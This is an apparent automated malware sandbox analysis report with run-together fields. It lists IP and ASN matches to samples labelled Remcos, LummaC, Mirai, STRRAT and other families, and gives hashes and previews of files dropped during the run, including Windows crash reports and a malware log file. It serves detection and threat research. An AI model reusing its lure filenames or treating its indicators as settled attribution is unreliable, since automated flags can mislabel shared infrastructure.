                                                                                                                                                                                            https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            s-part-0039.t-0009.t-msedge.netiGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            s-part-0032.t-0009.t-msedge.nethttps://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08okGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            TieLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                            geoplugin.netiGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50

                                                                                                                                                                                            ASNs

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            COMBAHTONcombahtonGmbHDEiGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 185.234.72.215
                                                                                                                                                                                            b1593574e46fb1f30b1da4fa594f43bb52b051a616db3.exeGet hashmaliciousXenoRATBrowse
                                                                                                                                                                                            • 194.59.30.69
                                                                                                                                                                                            Syncing.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                            • 185.223.30.86
                                                                                                                                                                                            l4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 194.59.30.220
                                                                                                                                                                                            l4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 194.59.30.220
                                                                                                                                                                                            client.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 194.59.30.220
                                                                                                                                                                                            client.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 194.59.30.220
                                                                                                                                                                                            Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                            • 194.59.30.164
                                                                                                                                                                                            Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                            • 194.59.30.164
                                                                                                                                                                                            Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                            • 194.59.30.164
                                                                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSfuckunix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 20.207.85.197
                                                                                                                                                                                            fuckunix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 52.241.5.221
                                                                                                                                                                                            Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 20.82.228.36
                                                                                                                                                                                            Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 40.113.111.211
                                                                                                                                                                                            Fantazy.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 20.53.37.124
                                                                                                                                                                                            Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 20.113.156.73
                                                                                                                                                                                            Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 20.92.77.27
                                                                                                                                                                                            iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 157.55.8.211
                                                                                                                                                                                            31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 20.85.193.111
                                                                                                                                                                                            ATOM86-ASATOM86NLiGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50

                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                            No context

                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                            No context

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4XYAW8PbZH.exe_fb8bfc38e9eaced71724e5b2199a676ca42983a_c5adc74b_44433827-fed0-4b45-a91b-c05dbb2370fe\Report.wer

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                            Entropy (8bit):1.2455535779926308
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:9O/kiA0BU/qaOOJoNZrMSCdzuiFcEZ24IO8X:Y/kuBU/qaJSmzuiFcEY4IO8X
                                                                                                                                                                                            MD5:CCEBF85FE19FE46ED1F5893573E6CB4A
                                                                                                                                                                                            SHA1:A7EA56BE2A44C4A55505BD23D596C8D09513D3FA
                                                                                                                                                                                            SHA-256:D61D33D3024C67E11629030CC6C1989371AC5EAE93309B9F29E073E4E06453D2
                                                                                                                                                                                            SHA-512:0EE7D532DE3C0468C6D547FACE6EE831A3469D3600DAA7DF0029AE708D8E9315D510A6414B4E1A9986EA402DB7767464CDE0FCDAC93764DBEFDF83FFBF26DBDC
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.8.6.1.1.3.5.2.6.2.0.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.8.6.1.1.5.7.4.4.9.5.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.4.3.3.8.2.7.-.f.e.d.0.-.4.b.4.5.-.a.9.1.b.-.c.0.5.d.b.b.2.3.7.0.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.0.2.1.b.e.d.-.c.1.1.b.-.4.9.1.c.-.9.f.d.0.-.0.e.9.f.9.e.7.0.0.3.e.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.X.Y.A.W.8.P.b.Z.H...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.t.Y.f.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.0.-.0.0.0.1.-.0.0.1.4.-.c.9.e.3.-.8.c.e.f.c.f.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.3.a.b.0.7.8.a.6.d.b.a.6.7.3.f.7.f.d.4.4.2.e.8.4.2.7.c.4.e.b.0.0.0.0.0.0.0.0.!.0.0.0.0.9.a.a.5.3.8.0.d.c.8.7.8.2.9.c.6.f.a.2.2.e.9.0.2.9.c.a.d.c.a.b.9.f.6.2.2.1.e.f.9.

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_graias.exe_34237b487eab89ca4e2d95dcb173dc97a97d253_c6a5d7f6_e4ec3dec-24aa-46c3-9019-ab8b61d61b30\Report.wer

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                            Entropy (8bit):1.2445990089136223
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:wPrALohOA0BU/6aGuJoNZrMSCdzuiFcEZ24IO8O:LchCBU/6aBSmzuiFcEY4IO8O
                                                                                                                                                                                            MD5:FC416533FC285E770BB329C167EDA0A9
                                                                                                                                                                                            SHA1:4F980936B8872B3C20EAD3E61A9B9951C8E8AD45
                                                                                                                                                                                            SHA-256:37A34027704D74D2FC1462C0F19AA91876C5FEFC79868805EE8D8C78E007F098
                                                                                                                                                                                            SHA-512:5A99C0A4251FB67780CFFE6831E4E50C2A5DF275EB8BF519D0B910C8027E2F5B922F384AD7030104EDF9464534FA5C1446EB01C517CC4F18BE0A5F376F2BC1BA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.8.6.1.1.7.0.1.6.4.6.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.8.6.1.1.8.5.1.6.4.4.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.e.c.3.d.e.c.-.2.4.a.a.-.4.6.c.3.-.9.0.1.9.-.a.b.8.b.6.1.d.6.1.b.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.d.3.a.e.7.1.-.e.b.b.d.-.4.6.1.a.-.8.2.9.2.-.2.9.b.d.0.7.e.e.3.9.e.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.r.a.i.a.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.t.Y.f.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.1.4.-.0.0.0.1.-.0.0.1.4.-.8.4.8.8.-.5.9.f.1.c.f.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.3.a.b.0.7.8.a.6.d.b.a.6.7.3.f.7.f.d.4.4.2.e.8.4.2.7.c.4.e.b.0.0.0.0.0.0.0.0.!.0.0.0.0.9.a.a.5.3.8.0.d.c.8.7.8.2.9.c.6.f.a.2.2.e.9.0.2.9.c.a.d.c.a.b.9.f.6.2.2.1.e.f.9.!.g.r.a.

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD47C.tmp.dmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Sat Jan 4 17:41:54 2025, 0x1205a4 type
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):334044
                                                                                                                                                                                            Entropy (8bit):3.8616172341243127
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:OIouSHc4uEqBy/nmLTgcjSO4X4GY6C28pFVNS:OESHc4AyfkTgp228r
                                                                                                                                                                                            MD5:9D2A395110EF5EBE512B59469A135BAE
                                                                                                                                                                                            SHA1:D615B6DC51EA00A89194AEFE9A5853537E0D3E01
                                                                                                                                                                                            SHA-256:8620107942EECAD255EEF7E5AEBF77CFCF4CA5C5B930BDD0D8B654EAB9E69F29
                                                                                                                                                                                            SHA-512:13630D58BD11DDAB26F3EEA66347D8BB08B1DA0E6540A1289EDE4B716D14F83E790983CD060032F7265D89EF5A6284F634DB72B7F7284396BCC5AC9CC4BF24BA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MDMP..a..... ........ryg........................0"..........$....,......d/...e..........`.......8...........T............B..............<,..........(...............................................................................eJ..............GenuineIntel............T.......@....ryg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD75C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                            Entropy (8bit):3.701231701297229
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:R6l7wVeJEnR6E6Y93SU9xXgmfZlCprK89bQ/sfEwm:R6lXJC6E6YNSU9xXgmfbcQkfC
                                                                                                                                                                                            MD5:2538A9EF815A757F99BF867388D226F9
                                                                                                                                                                                            SHA1:C4E380138896AFF3CB2C7077B768C2C3FCAE5096
                                                                                                                                                                                            SHA-256:9F340E9DC56EB7B987212458B4814E7555DF41C411BC86DA87A9DFEE1444904F
                                                                                                                                                                                            SHA-512:D82959B3908790441584E247D8383BC827B39C96E4BC7E475E8EE2F7DF71719DC91CD4A0432480C2624D06A18B3EF42A346B8831D3A9312718AA8E06D9A90443
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.7.6.<./.P.i.

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7BA.tmp.xml

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4741
                                                                                                                                                                                            Entropy (8bit):4.475061324098097
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg77aI93xDCWpW8VYfYm8M4JAK46F64H+q8vDK4z3DZfJd:uIjfBI7pxDD7VbJ24HKl3VfJd
                                                                                                                                                                                            MD5:6A2BA31E5E776D9AC550C1B508B99712
                                                                                                                                                                                            SHA1:45A78BF593EB946A0D12CDFC404B1850B9DAC2C2
                                                                                                                                                                                            SHA-256:1ABFBFD39AE83E1AB25E170D833F5CD110106433BEE387E02EB89068F6A47A13
                                                                                                                                                                                            SHA-512:D9CE67E4AFD6FD1FC6F609EA0C864FC357C8232F0A2D9A4354492DB5C16B957C919C764CABDDF7433EC0A887545F423A96369A73A6E405D30C5BA41C72EF6488
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661484" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE219.tmp.dmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Sat Jan 4 17:41:57 2025, 0x1205a4 type
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):335758
                                                                                                                                                                                            Entropy (8bit):3.9073969862679863
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:z9iZIQOSiGasc4uEq7yPLTgTYP0omcgvyMN1ooxiCISThM:zgZI+iGasc4+yjTgrv5VxN
                                                                                                                                                                                            MD5:DBC101C38F26AC2D3CBA67065BD7B769
                                                                                                                                                                                            SHA1:FB3DD2AE55EC3FC6B493612B96A76EE2D7E4B286
                                                                                                                                                                                            SHA-256:826268E4FADCF94E9E0C53EE1580A007F7DA34661F8321939E67C92AA1F39BEC
                                                                                                                                                                                            SHA-512:2E00D26C52DE74700A1D932E453532E13A489B7C3518AAC320E78CE434A72CB892D0D83340A036A017296FC6EF3B0FB417CB16CBC31C7C3BA2F2D575FF8DC041
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MDMP..a..... ........ryg........................0"..........$....,......./...e..........`.......8...........T...........xB..............<,..........(...............................................................................eJ..............GenuineIntel............T............ryg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE45C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8338
                                                                                                                                                                                            Entropy (8bit):3.687232782228521
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:R6l7wVeJwk6qr6Y3D6FnGgmfZxCpra89bLzsfsrZZm:R6lXJj6u6YT6VGgmffcLYfF
                                                                                                                                                                                            MD5:38EFD7118FDAF349D9370AA433548610
                                                                                                                                                                                            SHA1:684DDA6A453AC6D02F9B3FFB8B871FDF5751DB4B
                                                                                                                                                                                            SHA-256:B49581C230F0717B922E2121B9355D16C3076CB24F4F4FDAD98145028B2A4C1D
                                                                                                                                                                                            SHA-512:9AA7D16BA698F856CDF0BB38B5149CA09A2AAF8CDA68E0FC764D15313238BFFBBFBCCCE9B21178546037773A8564D564935D8B3DFD62E54F85D2FDB7C05E1A0C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.8.8.<./.P.i.

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE49B.tmp.xml

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4721
                                                                                                                                                                                            Entropy (8bit):4.430900339297858
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg77aI93xDCWpW8VY/Ym8M4J0ZcKK46F5+q8vQKK4wDVtOGtvd:uIjfBI7pxDD7VHJ0cKAPOkvd
                                                                                                                                                                                            MD5:41DF37246136B0FF9566C41E2639B826
                                                                                                                                                                                            SHA1:98FCCBD67A14826B60E6D56EECA7B00BF1C284E2
                                                                                                                                                                                            SHA-256:FA8F676BFFAEC2FC441BCDD716E131922244FDC99BE3EB8B16B5B44D7F40F62D
                                                                                                                                                                                            SHA-512:0CBDBD5F13D976B466FD5C975007F07580B3A7277A94B3A992630158BFFC32095C4140EC8ED16746CEC20DCC97C87B34F158DADB3A6240F8797CEAE2FAC26DA2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661484" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                            C:\ProgramData\graias\logs.dat

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):31162
                                                                                                                                                                                            Entropy (8bit):3.5778823506708664
                                                                                                                                                                                            Encrypted:false
